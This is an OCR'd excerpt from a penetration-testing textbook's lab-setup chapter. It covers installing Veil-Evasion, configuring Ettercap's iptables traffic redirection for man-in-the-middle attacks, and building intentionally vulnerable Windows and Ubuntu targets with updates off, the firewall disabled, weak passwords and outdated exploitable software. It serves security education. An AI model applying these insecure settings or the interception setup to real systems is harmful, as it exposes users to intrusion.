creating: Veil-Evasion-master/
--snip--

inflating: Veil-Evasion-master/tools/pyherion.py
root@kali:~# cd Veil-Evasion-master/setup
root@kali:~/Veil-Evasion-master/setup# ./setup.sh

[Web]: https://www.veil-evasion.com | [Twitter]: @veilevasion

[*] Initializing Apt Dependencies Installation
--snip—

Do you want to continue? [Y/n]? Y

--snip--

root@kali:~#

Listing 1-3: Installing Veil-Evasion
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Ettercap

Ettercap is a tool for performing man-in-the-middle attacks. Before run-
ning it for the first time, we need to make a couple of changes to its config-
uration file at /etc/ettercap/etter.conf. Open its configuration file from a Kali
root prompt in the nano editor.

root@kali:~# nano /etc/ettercap/etter.conf

First change the userid and groupid values to 0 so Ettercap can run with
root privileges. Scroll down to where you see the following lines in the file.
Replace whatever values you see following the equal signs (=) with a o.

[privs]
ec uid = 0 # nobody is the default
ec gid =0 # nobody is the default

Now scroll down to the Linux section of the file and uncomment
(remove the leading # characters) before the two lines shown at @ and @
in Listing 1-4 to set Iptables firewall rules to redirect the traffic.

# if you use ipchains:

%rport"”

%rport"

#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT

#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT

# if you use iptables:

Oredir_command on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j

REDIRECT --to-port %rport"
@®redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j
REDIRECT --to-port %rport"”

Listing 1-4: Ettercap configuration file
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Save and exit the file by pressing CTRL-X and then Y to save the changes.

Setting Up Android Emulators

Now we’ll set up three Android emulators on Kali to use for mobile testing
in Chapter 20. First we’ll need to download the Android SDK.

1. Open the Iceweasel web browser from within Kali and visit Attps://
developer.android.com/sdk/index.html.

2. Download the current version of the ADT bundle for 32-bit Linux and
save it to your root directory.



3. Open a terminal, list the files there (1s), and extract the compressed
archive that you just downloaded with unzip (the x’s represent the name
of your file, as versions may have changed since this was written).

root@kali:~# unzip adt-bundle-Linux-x86-XXXXXXXXXXX.Zip

4. Now use cd to go into the new directory (with the same name as the file
without the .zip extension).

# cd sdk/tools
# ./android

5. The Android SDK Manager should open, as shown in Figure 1-13.

Figure 1-13: The Android SDK Manager

We’ll download any updates to the Android SDK tools and Android SDK
platform tools (checked by default), as well as Android 4.3 and a couple of
older versions of Android with specific vulnerabilities, Android 2.2 and
Android 2.1. Select the boxes to the left of each Android version. Then
(leaving Updates/New and Installed checked) click Install packages, as
shown in Figure 1-14. Accept the license agreement, and the Android SDK
should download and install the chosen packages. Installation will likely
take several minutes.
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Figure 1-14: Installing Android software
Now it’s time to set up our Android virtual devices. Open the Android

SDK Manager and choose Tools » Manage AVDs. You should see the win-
dow shown in Figure 1-15.

Figure 1-15: Android Virtual Device Manager

24 Chapter 1



We’ll create three Android emulators based on Android 4.3, 2.2,

and 2.1, as shown in Figure 1-16. Use the values shown in the figure for
each emulator but set the value of Target to the Android version of the
emulator you would like to build (the Google API versions of Android 4.3
[Google APIs version 18], 2.2 [Google APIs version 8], and 2.1 [Google
APIs version 7]). Fill the AVD Name field with a descriptive value. Add a
small SD Card value (100MB should be more than sufficient) so you can

download files to your Android emulators. Set Device to Nexus 4 and Skin
to Skin with dynamic hardware controls. Leave the rest of the options at

their defaults.

Edit Android Virtual Device (AVD)

AVD Name: [Android4—3 l
Device: lNexus 4 (4.7", 768 x 1280: xhdpi) s l
Target: [Google APls (Google Inc.) - AP| Level 18 < J
CPU/ABL: lARM (armeabi-v7a) = l
Keyboard: Hardware keyboard present
Skin: lSkin with dynamic hardware controls < l
Front Camera: lNone < l
Back Camera: lNone < l
Memory Options: | RAM: |1907 VM Heap:
Internal Storage: lZOO l lMiB e l
SD Card:

® size: [100 HMiB < ]

O File: | | E|~I
Emulation Options: | [] Snapshot [J Use Host GPU

Cancel l l oK

Figure 1-16: Creating an Android emulator

Once you've built all three emulators, your AVD Manager should look

like Figure 1-17 (device names may be different of course).

Setting Up Your Virtual Lab
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Figure 1-17: Android emulators created in Android Virtual Device Manager

To start an emulator, highlight it and click Start. Then click Launch in
the pop-up, as shown in Figure 1-18.

Figure 1-18: Launching an Android emulator
It may take a few minutes for the emulator to boot up for the first time,
but once it does, you should have something that looks and feels much like

areal Android device. The Android 4.3 emulator is shown in Figure 1-19.
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Figure 1-19: Android 4.3 emulator

To run the Android emulators in Kali, you will likely need to increase the perfor-
mance of your virtual machine by increasing its RAM and CPU cores. I am able to
run all three emulators with 3GB RAM and two CPU cores allocated to Kali. You
can make these changes in the virtual machine settings in your VMuware product. The
amount of power you can give to Kali will, of course, depend on the resources avail-
able on your host machine. As an alternative, instead of running the Android emula-
tors on Kali Linux, you can install Android and the emulators on your host system
or even another system on the local network. The exercises in Chapter 20 will work as
long as the emulators can communicate with Kali.

Smartphone Pentest Framework

Next, download and install the Smartphone Pentest Framework (SPF), which
we’ll use for mobile attacks. Use git to download the source code. Change
to the downloaded Smartphone-Pentest-Framework directory as shown here.

root@kali:~# git clone -b SPFBook https://github.com/georgiaw/Smartphone-Pentest-Framework.git
root@kali:~# cd Smartphone-Pentest-Framework

Now open the file kaliinstall in the nano text editor. The first few lines
are shown in Listing 1-5. Note the lines that refer to /ro0t/adt-bundle-linux
-x86-20131030/sdk/tools/android. If the name of your ADT bundle folder is
different (due to the release of a subsequent version), change this value to
match the correct place where you installed the Android ADT in the previ-
ous section.
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root@kali:~/Smartphone-Pentest-Framework# nano kaliinstall

#!/bin/sh

## Install needed packages

echo -e "$(tput setaf 1)\nInstallin serialport, dbdpg, and expect for perl\n"; echo "$(tput
sgro)"

echo -e "$(tput setaf 1)HHHHHHHHHHHHHHHHHHHRAHHHEFSSHEABSEE#\N " ; echo "$(tput sgro)"

echo $cwd;

#apt-get -y install libexpect-perl libdbd-pg-perl libdevice-serialport-perl;

apt-get install ant

/root/adt-bundle-1inux-x86-20131030/sdk/tools/android update sdk --no-ui --filter android-4 -a
/root/adt-bundle-1linux-x86-20131030/sdk/tools/android update sdk --no-ui --filter addon-google
apis-google-4 -a

/root/adt-bundle-1linux-x86-20131030/sdk/tools/android update sdk --no-ui --filter android-14 -a
/root/adt-bundle-1inux-x86-20131030/sdk/tools/android update sdk --no-ui --filter addon-google_
apis-google-14 -a

--snip--

Listing 1-5: Installing Smartphone Pentest Framework

Now run the kaliinstall script, as shown here.

root@kali:~/Smartphone-Pentest-Framework# ./kaliinstall

This will set up the SPF, which we’ll use in Chapter 20.

Finally, we need to make one more change to the configuration file for
SPF. Change directories to Smartphone-Pentest-Framework/frameworkconsole
and open the file configin nano. Look for the option #LOCATION OF ANDROID
SDK. If your ADT bundle folder name has changed since the version current
at the time of this writing, change it accordingly in the line that begins with
ANDROIDSDK=.

root@kali:~/Smartphone-Pentest-Framework# cd frameworkconsole/
root@kali:~/Smartphone-Pentest-Framework/frameworkconsole# nano config
--snip--

#LOCATION OF ANDROID SDK

ANDROIDSDK = /root/adt-bundle-1linux-x86-20131030/sdk

--snip--

Target Virtual Machines

We’ll use three custom-built target machines to simulate vulnerabilities
often found in client environments: Ubuntu 8.10, Windows XP SP3, and
Windows 7 SP1.

You'll find a link to a torrent containing the Ubuntu virtual machine
at hitp://www.nostarch.com/pentesting/. The target system is compressed using
the 7-Zip archive, and IstPentestBook?!is the password for the archive. You can
use 7-Zip programs to open the archives for all platforms. For the Windows
and Linux packages, use http://www.7-zip.org/download.html; for Mac OS, use
Ez7z at hitp://ez7z.en.softonic.com/mac/. The archive is ready for use as soon as
itis unzipped.
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To set up the Windows virtual machines, you’ll need to install and con-
figure Windows XP SP3 and 32-bit Windows 7 SP1. Sources for the installa-
tion media include TechNet and MSDN (the Microsoft Developer Network),
among others. (You should be able to use your Windows virtual machines
on a trial basis for 30 days without a license key.)

Creating the Windows XP Target

Your Windows XP target should be a base installation of Windows XP SP3
with no additional security updates. (Visit my website at http://www
.bulbsecurity.com/ for more information about finding a copy of Windows XP.)
Once you have a copy of Windows XP SP3, here’s how to install it on
Microsoft Windows or Mac OS.

VMware Player on Microsoft Windows
To install Windows XP on VMware Player for Windows:

1. Choose Create A New Virtual Machine in VMware Player and point
the New Virtual Machine Wizard to the Windows XP installation disk
or ISO image. Depending on your source disk or image, you may be
offered the option to use Easy Install (if you're installing a version with
a license key), or you may see a yellow triangle warning, “Could not
detect which operating system is in this disc image. You will need to
specify which operating system will be installed.” In the latter case, just
press Next.

2. In the Select a Guest Operating System dialog, select Microsoft Windows
in the Guest operating system section and your version of Windows XP in
the drop-down box, as shown in Figure 1-20, and press Next.

Figure 1-20: Selecting your version of Windows XP
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3. In the next dialog, enter Bookxp XP SP3 as the name of your virtual
machine and press Next.

4. In the Specify Disk Capacity dialog, accept the recommended hard disk
size for your virtual machine of 40GB and check the box for Store vir-
tual disk as a single file, as shown in Figure 1-21, and press Next.

Figure 1-21: Specifying the disk capacity

The Virtual Machine will not take up the entire 40GB; it will only take up space on
your hard drive as needed. This is just a maximum value.

5. In the Ready to Create Virtual Machine dialog, shown in Figure 1-22,
click Customize Hardware.

Figure 1-22: Customizing your hardware
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6. In the Hardware dialog, choose Network Adapter, and in the Network
Connection field that appears, select Bridged: Connected directly to
the physical network. Next, click Configure Adapters and select the
adapter you're using to connect to the Internet, as shown in Figure 1-23.
Then press OK, Close, and Finish.

Figure 1-23: Configuring your network adapter as bridged

You should now be able to play your Windows XP virtual machine.
Continue to the instructions for installing and activating Windows XP
in “Installing and Activating Windows” on page 32.

VMware Fusion on Mac 0S

In VMware Fusion, go to File » New » Import from disk or image
and point it to the Windows XP installation disk or image, as shown
in Figure 1-24.
Follow the prompts to create a fresh installation of Windows XP SP3.
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Figure 1-24: Creating a new virtual machine

Installing and Activating Windows

As part of the installation process, you will be prompted for a Windows
license key. If you have one, enter it here. If not, you should be able to use
the virtual machine on a trial basis for 30 days. To continue without enter-
ing a license key, click Next when prompted for the key. A pop-up will warn
you that entering a license key is recommended and ask if you would like to
enter one now, as shown in Figure 1-25. Just click No.

e
¥ Windows

=X

Collecting

information Y 1
ou\'(( 1 Entry of a product key wil be required laker for continued use of
LY

Windows, IF wou choose not ko enter the produck key now, you
might need to reinstall \windows later and potentially lose files and
information, or you might need ko purchase another edition of
Windows,

Dynamic
Update

Preparing

installation
= ‘We strongly recommend that you enter your product key now.,

Do you want ko enter your produck key now?

Yes Mo

Setup will complete
approximately:

33 minutes Product Key:

Figure 1-25: license key dialog
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As shown in Figure 1-26, when prompted, set Computer name to Bookxp.
Set Administrator password to password.

g
*5 Windows

Windows XP Profes: al Setup

p Mame and Admini: P. d

“You must provide a name and an Administrator passward far your computer.

Collecting
information C:

Dynamic
Update

Preparing : )
installation Setup has suggested a name for your computer. [F your computer is on &
netwark, your network administrator can tell you what name to use.

Computer name: Bookxp

Setup creates a user account called Administratar. You use this account when
you need full access to pour computer,

approximately: -
pp33 minuteys Type an Administrator password

Adrninistratar pagsword: I'""---

Confirm password: I"Oouu

Figure 1-26: Setting the computer name and Administrator password

You can leave the date/time and TCP/IP settings at their defaults when
prompted. Likewise, leave the Windows XP target as part of the workgroup
WORKGROUP instead of joining it to a domain, as shown in Figure 1-27.

B gy Ve
#5 Windows

Windows XP Professional Setup
Collecting

information ‘Workgroup or Computer Domain
A workgroup is a collection of computers that have the same workgroup narme. A

Dynamic domain iz a collection of computers defined by a network. administrator,
Update

Preparing
installation Do pou want this computer to be a member of a domain?
['"ou may need to obtain this information from your nebwork. administrator. )

= Mo, this computer is not on & network, or is on 3 network, without & demain.
Make this computer a member of the fallowing waork group:

[WORKGROUP
Setup will complete
approximately:
30 minutes ™ Yes, make this compuiter a member of the following domain:

Figure 1-27: Workgroup settings
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Tell Windows not to automatically install security updates, as shown in
Figure 1-28. This step is important, because some of the exploits we will run
rely on missing Windows patches.

*» Windows

Help protect your PC

right now
tu

No information is collected that can be used to identify you or contact you.
it

Figure 1-28: Turning off automatic security updates
You will then be prompted to activate Windows. If you entered a license

key, go ahead and activate it. Otherwise you can choose No, remind me
every few days, as shown in Figure 1-29.

* 2 Windows

Ready to activate Windows?

Figure 1-29: Activating Windows
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Now create user accounts georgia and secret, as shown in Figure 1-30. We
will create passwords for these users after setup is finished.

'3 Windows

Who will use this computer?

georgia

Figure 1-30: Adding users

When Windows starts up, log in as the user georgia with no
password.

Installing VMware Tools

Now install VMware Tools, which will make it easier to use your virtual
machine by, for example, letting you copy/paste and drag programs onto
the virtual machine from the host system.

VMware Player on Microsoft Windows

In VMware Player, install VMware Tools from Player » Manage » Install
VMware Tools, as shown in Figure 1-31. The VMware Tools installer should
automatically run in Windows XP.
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Figure 1-31: Installing VMware Tools in VMware Player

VMware Fusion on Mac 0S

Install VMware Tools from Virtual Machines » Install VMware Tools, as
shown in Figure 1-32. The VMware Tools installer should automatically run
in Windows XP.

Windows is running

Suspend
Restart
Shut Down

Pause

Settings...
Snapshots...
Get Info...

Send Key
Send Ctrl-Alt-Del

Install VMware Tools
Install McAfee AntiVirus Plus

Network Adapter

Hard Disk (IDE)
CD/DVD (IDE)
Sound Card
USB & Bluetooth
Sharing

T % 10:40PM

Figure 1-32: Installing VMware Tools in VMware Fusion
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Turning Off Windows Firewall

Now open the Control Panel from the Windows Start menu. Click Security
Center » Windows Firewall to turn off the Windows Firewall, as shown in
Figure 1-33.

3 Windows Security Center ‘ZHE”Z‘

= Windows Firewall |z| I"..i,' Secu nty Center
General | Exceptions | Advanced|

Help protect your PC

O ON | ¥
‘Windows Firewall helps protect your computer by preventing unauthorized users
from gaining access ko your computer through the Intemnet or a network.

© CHECK SETTINGS | 2

@ © On [recommended) H For this computer, Click Turn on Automatic Updates to
computer current with important updates
pdates help protect my computer?

Turn on Automatic Updates
Don't allow exceptions

Select this when you connect to public networks in less secure - @ MNOT FOUND £
Iocations, such as airports. You will nat be notified when Windows

Firewall blacks programs. Selections on the Exceptions tab will be on this computer, Antivirus software helps protect
ignored, ¥ security threats, Click Recommendations For

oes antivirus software help probect my computer?
@ (&) Off [not recommended) fiarecoiy 3
Avoid using this setting. Turning off “Windows Firewal may make thiz
computer more vulnerable to viuses and intruders.

for:

Thiz setting blocks all outside sources friom connecting to this
computer, with the exception of those selected on the Exceptions tab

Wwéhat else should | know about Windows Firevall? ' Automatic Updates

Figure 1-33: Turning off the Windows firewall

Setting User Passwords

Again in the Control Panel, go to User Accounts. Click the user georgia
and then select Create a password. Set georgia’s password to password, as
shown in Figure 1-34. Do the same thing for the user secret, but set secret’s
password to Password123.

-2 User Accounts

Learn About

Create a password for your account

@ Creating a secure password

@ ﬁreatlng a good password Type a new password:
int

m Remembering a password

Type the new password again ko confirm:

If your password contains capital letters, be sure ta bype them the same way every time
waou lag on.

[password

The password hint will be visible to everyone wha uses this computer.

Create Password

Figure 1-34: Setting a user password
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Setting a Static IP Address

Next, set a static IP address so your networking information won’t change
as you work through the book. But first we need to figure out the address
of our default gateway.

Ensure that your Windows XP system is set to use bridged networking
in VMware. By default, your virtual machine will automatically pull an IP
address using DHCP.

To find the default gateway, open a Windows command prompt by
going to Start » Run, entering cmd, and clicking OK. In the command
prompt, enter ipconfig. This will show you the networking information,
including the default gateway.

C:\Documents and Settings\georgia>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : XXXXXXXX

IP Address. . . . . . . . . . . . :192.168.20.10
Subnet Mask . . . . . . . . .. . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.1

C:\Documents and Settings\georgia>

In my case, the IP address is 192.168.20.10, the subnet mask is
255.255.255.0, and the default gateway is 192.168.20.1.

1. In the Control Panel, go to Network and Internet Connections and
click Network Connections at the bottom of the screen.

2. Right-click Local Area Connection and then select Properties.

3. Highlight Internet Protocol (TCP/IP) and select Properties. Now
enter a static IP address and set the Subnet mask and Default gateway
to match the data you found with the ipconfig command, as shown in
Figure 1-35. Set the Preferred DNS server to your default gateway as well.

Now it’s time to see if our virtual machines can communicate. Once
you’re sure that the settings match, return to the Kali virtual machine (start
it if you had shut it down) and enter ping <static ip address of your Windows
XP virtual machines, as shown here.

My IP address is 192.168.20.10. Throughout the book, you should replace this
value with the IP address of your systems.

root@kali:~# ping 192.168.20.10

PING 192.168.20.10 (192.168.20.10) 56(84) bytes of data.
64 bytes from 192.168.20.10: icmp_req=1 tt1=128 time=3.06 ms
e
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Internet Protocol (TCP/IP) Properties

General

*Y'ou can get |P zettings assigned automatically if your network, supports
this capability. Othenwise, vou need to ask vour network. administrator for
the appropriate |P settings.

(O Obtain an IF address automatically
(& Use the fallawing IP address:

IP address: 192 0168 . 20 .10
Subnet mask: 285 255 0285 . 0
Drefault gateway: 192 1688 . 20 . 1

Obtain DMS zerver address automatically

(& Use the fallawing DMS server addresses:

Frefened DNS server: 192 1680 20 . 1

Alternate DNS server:

|

[ Ok, ][ Cancel ]

Figure 1-35: Setting a static IP address

Enter cTRL-C to stop the ping command. If you see output beginning
with 64 bytes from <ip address of XP>, as shown previously, your virtual
machines are able to communicate. Congratulations! You've set up a net-
work of virtual machines.

If instead you see a message including the text Destination Host
Unreachable, troubleshoot your networking: Make sure your virtual
machines are on the same bridged virtual network, check that your
default gateway is correct, and so on.

Making XP Act Like It's a Member of a Windows Domain

Finally, we need to modify a setting in Windows XP so that it will behave as
if it were a member of a Windows domain, as many of your clients will be.
I'm not having you set up an entire Windows domain here, but during post
exploitation, a couple of exercises will simulate a domain environment.
Return to your XP virtual machine and follow these steps.

1. Select Start » Run and enter secpol.msc to open the Local Security
Settings panel.

2. Expand Local Policies on the left and double-click Security Options
on the right.

3. In the Policy list in the pane on the right, double-click Network access:
Sharing and security model for local accounts and choose Classic
- local users authenticate as themselves from the drop-down list, as
shown in Figure 1-36.
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Figure 1-36: Changing a local security setting to make your target act like a member of a
Windows domain

4. Click Apply and then OK.

5. Close any open windows in your virtual machine.

Installing Vulnerable Software

In this section we’ll install some vulnerable software on our Windows XP
virtual machine. We’ll be attacking this software in later chapters. Open
your Windows XP virtual machine and, while still logged in as user georgia,
follow the directions to install each of the packages listed here.

Zervit 0.4

Download Zervit version 0.4 from http://www.exploit-db.com/exploits/12582/.
(Click the Vulnerable App option to download the files.) Unzip the down-
loaded archive and double-click the Zervit program to open and run it.
Then enter port number 3232 in the console when the software starts.
Answer Y to allowing directory listing, as shown in Figure 1-37. Zervit will
not automatically restart when you reboot Windows XP, so you will need to
restart it if you reboot.
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to listen<88>: 3232
Accept directory listing [¥-/N1: ¥

[-1Zervit HITP Server STARTED

Figure 1-37: Starting Zervit 0.4

SLMail 5.5

Download and run SLMail version 5.5 from http://www.exploit-db.com/
exploits/638/, using the default options when prompted. Just click Next for
all of the options and don’t change anything. If you get a warning about a
domain name, just ignore it and click OK. We don’t really need to deliver
any email here.

Once SLMail is installed, restart your virtual machine. Then open
Start » All Programs » SL Products » SLMail » SLMail Configuration.
In the Users tab (default), right-click the SLMail Configuration window
and choose New » User, as shown in Figure 1-38.

" BVRP Software POP3 Server on Local Machine [bookxp] .

Access ] Contral ] About...

Users l Optiors ] System ] Connection Method ] Routing Options ] Logaging ] Timing ]

pamary <1 x| e 2

adrministrator daemon listproc listzary listzerver mail-daemon

mailer-d mailer-daemon  majordoma operator postmaster unknown

| 1 Alias
root &rrange Icons ¥
|- B | Responder
Import Users Forward
Export Users | Lisk

1 Users, 1 Hesponders,.ﬂ Lists

oK | Cancel

Figure 1-38: Adding a user in SLMail
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Click the newly created user icon, enter username georgia, and fill in
the information for the user, as shown in Figure 1-39. The mailbox name
should be georgia with password password. Keep the defaults and press OK

once you've finished.

Edit User georgia (]

Full Mame lGeorgia—

Password IW— Cancel |
MalBos [aeoria |
Carbon Copy I _I

[CForced Connection To TCPAP Port a
[w]Pop3 Mailbox Access
[wRemate Finger MNotification

Drescription
Allows uzers to query on the status of a mailbox and
to supply information about themselves uzsing the
Finger protocol
Currert:

Details |

Figure 1-39: Setting the user information in SLMail

3Com TFTP 2.0.1

Next, download 3Com TFTP version 2.0.1 as a zipped file from http://www
.exploit-db.com/exploits/3388/. Extract the files and copy 3CTftpSvcCtrl and
3CTftpSvc to the directory C:\Windows, as shown in Figure 1-40.

& WINDOWS
File  Edit View Favorites Tools Help

@Back - Q L@ pSearch u:‘ Folders v

Address |23 CYWINDOWS

System Tasks LJ LJ LJ ‘.J
addins AppPatch Confi Connection
Hide the contents of i 2 Wizard

this Folder

;_-‘Q Add or remove e
programs I_J

,‘) Search For files or
folders

Debug Downloaded
Program Files

oo

Driver Cache home

File and Folder Tasks A J_J ’_,J B ’_J L\J

FCTFepSweChrl
=) Bove rja\u'a L2Schemas

Iﬂ Rename this file =
@ Move this file
D Copy this File LJ u I.J ‘.J
&3 Publish this file to the )

Mebwark,

Wb N :
() E-mall this file iagnastic

¥ Delete this file 1 J_J I_J i_,J I_J

msapps i

v|G0

Cursors

|

[

Offline Web
Pages

] 3

Figure 1-40: Copying 3Com TFTP to C:\Windows



Then open 3CTftpSvcCirl (the blue 3icon) and click Install Service, as
shown in Figure 1-41.

’ . - Install Service
Create directory names in incoming file requests? ird

; ; Start Service
Allowe ovenwrite of exist

Stop Service
Upload/Download dires

Uninstall Service

i

Per-packet timeout in s

M aximum retries [5-20];

Log transfers and errors to MT EventLog? v

Save Changes ‘ Guit ‘

Figure 1-41: Installing 3Com TFTP

Click Start Service to start 3Com TFTP for the first time. From now on, it
will automatically start when you boot up the computer. Press Quit to exit.

XAMPP 1.7.2

Now we’ll install an older version of the XAMPP software, version 1.7.2, from
http://www.oldapps.com/xampp.php 20ld_xampp=45/. (The older version of
Internet Explorer on Windows XP seems to have some trouble opening this
page. If you have trouble, download the software from your host system and
copy it onto Windows XP’s desktop.)

1. Run the installer and accept the default options as they’re presented to
you. When installation is finished, choose option 1. start XAMPP Control
Panel, as shown in Figure 1-42.

WINDOWSisystem32icmd.exe BE

SR R R R R S R I B T S R R e e
#

# Authors: Carsten Wiedmann {carsten_sttgtBgmx.de’
ogelgesang <{kvolapachefriends.org>

it Kay Uog B
S T R A A R A A R R I R A

start XAMPP Control Panel

relocate XAMPP

Ccurrent path: Cisxampp)

disable HTTPS <SSL>

disable Server Side Includes ¢(SSI>

enabhle IPu4 only {current: IPvd4-s6 (autod>
disable mod_perl

disable Apache::ASP

Exit

Please choose <1-7/x>: 1

Figure 1-42: Starting XAMPP Control Panel
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2. In the XAMPP Control Panel, install the Apache, MySQL, and FileZilla
services (select the Sve checkbox to the left of the service name). Then
click the Start button for each service. Your screen should look like the
one shown in Figure 1-43.

WINDOWSAsystem32\emd
S R T 0 00 0BG GGG GGG GGG GGG GGG G555 5 55 5 8
# HAMPP 1.7.2 — Setup = | = |
Sl e i el P 8@ xampp Control Panel Application
e el O e —
e T ®AMPP Contral Panel
§ Bl herss ﬁ:;“ﬁg;el{;: (Apache Friends Edition)
fizizizizizizizizizizizizizizizizizidididiy
start XAMPP Control il
relocate HAMPP V]S Apach R i T
{current path: C:o i £oshE = [ Stop ] [ gdoiy ] [ el ]
disable HTTPS (SSL: NPk MySgl  Runnin St Adrni SCM
disable Server Side e M 2 [ £ ] [ L ] [ = ]
enable IPv4 only <c|jEIETS FileZilla Running [ Stop | [ Admin ] [ Refresh ]
disable mod_perl
disable Apache::ASE N Mercury Adrnin
Exit Sve Tomcat Start Adrnin
Please choose ¢1-7-x>: .
Current Directory: C:i\xampp ~
Status Check OR -
Busy. ..
Apache service started
Busy. ..
My2QL service started
Busy. ..
FileZilla FTP service started :
< 3|
ot LE

Figure 1-43: Installing and starting XAMPP services

3. Click the Admin button for FileZilla in the XAMPP Control Panel. The
Admin panel is shown in Figure 1-44.

[Z FileZilla server

File Server Edit ?

[78 BE8g 2 ||lce@-

FileZilla Server version 0.9.32 beta

Copyright 2001-2009 by Tim K.ozze [tim kosse@filezila-project. org)
Connecting to server...

Connected, waiting for authentication

Logged on

Fietrieving account settings, please wait...

[one retrieving account settings

R l Account i P 1 Transfer
< 0 I i3
Ready |0 bytes received [0B/fs |0 bytes sent [0 Efs - N ’ZI

Figure 1-44: FileZilla Admin panel

Go to Edit » Users to open the Users dialog, shown in Figure 1-45.
5. Click the Add button on the right of the dialog box.
In the Add User Account dialog box, enter georgia and press OK.
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Users

Page:

- aeneral

- Speed Limits
“IP Filker

- Shared folders

Cancel |

—fAccount settings
¥ Enable account
¥ Password:

I Aok

Group membership: |<n0ne> LI

[~ Bypass userlimit of server

Maximurm connection count: o
I 1]

Connection limit per IP:

™ Force 551 for user login

Remave |

add |

Renarme | Copy |

r— Description

¥ou can enker some comments abouk the user

Figure 1-45:

Adding an FTP user

7. With georgia highlighted, check the Password box under Account
Settings and enter password.

Click OK. When prompted to share a folder, browse to the georgia’s
Documents folder on Windows and select it to share it, as shown in Figure 1-46.
Leave the defaults for all other checkboxes, as shown in the figure. Click
OK once you've finished and exit the various open windows.

Users

Page:

-General
-Shared folders
- Speed Limits
- 1P Filter

Cancel |

 Shared folder

¥ Read
[ white
[ Delete
I~ &ppend

Directories | Aliazes

H C:\Documents an...

— Directories ——
[ Create
[ Delete
I List

< ] | 3| | ¥ +Subdis

Remave |

add |

Add | Remove | Rename | Setashomedirl

Rename | Copy |

A directory alias will also appear at the specified location. Aliazes must contain the full local
path. Separate multiple aliazes for one directory with the pipe character [ | ]

If uzing aliazes, please avoid cyclic directory structures, it will only confuze FTP clients.

Figure 1-46: Sharing a folder via FTP
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Adobe Acrobat Reader

Now we’ll install Adobe Acrobat Reader version 8.1.2 from http://www.oldapps
.com/adobe_reader.php ?0ld_adobe=17/. Follow the default prompts to install it.
Click Finish once you’re done. (Here again you may need to download the

file to your host system and copy it to Windows XP’s desktop.)

War-FTP

Next, download and install War-FTP version 1.65 from http://www.exploit-db
.com/exploits/3570/. Download the executable from exploit-db.com to georgia’s
desktop and run the downloaded executable to install. You do not need to
start the FTP service; we will turn it on when we discuss exploit develop-
ment in Chapters 16 through 19.

WinSCP

Download and install the latest version of WinSCP from http://winscp.net/.
Choose the Typical Installation option. You can uncheck the additional
add-ons. Click Finish once youre done.

Installing Immunity Debugger and Mona

Now we’ll finish up the Windows XP virtual machine by installing a debug-
ger, a tool that helps detect errors in computer programs. We’ll be using
the debugger in the exploit development chapters. Visit the Immunity
Debugger registration page at hitp://debugger.immunityinc.com/ID_register.py.
Complete the registration and then press the Download button. Run the
installer.

When asked if you want to install Python, click Yes. Accept the license
agreement and follow the default installation prompts. When you close the
installer, the Python installation will automatically run. Use the default
installation values.

Once Immunity Debugger and Python have been installed, download
mona.py from http://redmine.corelan.be/projects/mona/repository/raw/mona.py/.
Copy mona.py to C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands,
as shown in Figure 1-47.

Open Immunity Debugger, and at the command prompt at the bottom
of the window, enter !mona config -set workingfolder c:\logs\%p, as shown in
Figure 1-48. This command tells mona to log its output to C:\logs\<program
name>, where <program name> is the program Immunity Debugger is cur-
rently debugging.

Now our Windows XP target is set up and ready to go.
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Figure 1-47: Installing Mona
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Figure 1-48: Setting up Mona's logs
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Setting Up the Ubuntu 8.10 Target

Because Linux is open source, you can simply download the Linux vir-
tual machine as part of the torrent for this book. Unzip the 7-Zip archive
BookUbuntu.7zip and use the password IstPentestBook?! to open the archive.
Open the .vmx file in VMware. If you are prompted with a message that
says the virtual machine appears to be in use, click Take Ownership and,
as with Kali, select I copied it. The username and password for the virtual
machine itself are georgia:password.

Once you have the Ubuntu virtual machine loaded, make sure the net-
work interface is set to Bridged in VMware and click the networking icon
(two computers) at the top right of the screen to attach the virtual machine
to the network. Do not install any updates if prompted. As with Windows XP,
we will exploit out-of-date software on this system. Now this virtual machine
is all set up. (I'll show you how to set a static IP address in Linux in Chapter 2.)

Creating the Windows 7 Target

Chapter 1

As with Windows XP, you’ll need to install a copy of Windows 7 SP1 in
VMware by loading your image or DVD. A 30-day trial version of 32-bit
Windows 7 Professional SP1 will work fine, but you’ll need to activate it after
30 days if you wish to continue using it. To find a legal version of Windows 7
SP1, try one of the following:

e Visit http://www.softpedia.com/get/System/OS-Enhancements/ Windows-7.shtml.
o Visit http://technet.microsoft.com/en-us/evalcenter/dn407368.

Your school or workplace may have access to programs like DreamSpark or BizSpark
that give you access to Windows operating systems. You can also check my website
(http://www.bulbsecurity.com/) for more resources.

Creating a User Account

After installing Windows 7 Professional SP1, opt out of security updates and
create user Georgia Weidman as an administrator with a password of pass-
word, as shown in Figures 1-49 and 1-50.

Again opt out of automatic updates. When prompted, set the comput-
er’s current location to a work network. Once the installation has finished,
log in to the account Georgia Weidman. Leave the Windows Firewall enabled.
VMware will reboot Windows 7 a few times as it installs everything.

Now tell VMware to install VMware Tools, as you did in the Windows XP
section. After instructing VMware to install VMware Tools in the virtual
machine, if the installer does not automatically run, go to My Computer
and run the VMware Tools installer from the virtual machine’s DVD drive,
as shown in Figure 1-51.



£7 Windows 7 Professional

Choose a user name for your account and name your computer to distinguish it on the network.

Type a user name (for example, John):
Georgia Weidman

Type a computer name:
GeorgiaWeidman

@ Copyright © 2009 Microsoft Corporation. All rights reserved.

[ ee ]

Figure 1-49: Setting a username

Set a password for your account

Creating a password is a smart security precaution that helps protect your user account from
unwanted users. Be sure to remember your password or keep it in a safe place.

Type a password (recommended):

Retype your password:

Type a password hint (required):

password|

Choose a word or phrase that helps you remember your password,
If you forget your password, Windows will show you your hint,

Figure 1-50: Setting a password for the user Georgia Weidman
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Figure 1-51: Installing VMware Tools

Opting Out of Automatic Updates

Though our attacks on Windows 7 will largely rely on flaws in third-party
software rather than missing Windows patches, let’s once again opt out of
Windows updates for this virtual machine. To do this, go to Start » Control
Panel » System and Security. Then under Windows Update, click Turn
Automatic Updating On or Off. Set Important updates to Never check for

updates (not recommended) as shown in Figure 1-52. Click OK.

==]=]

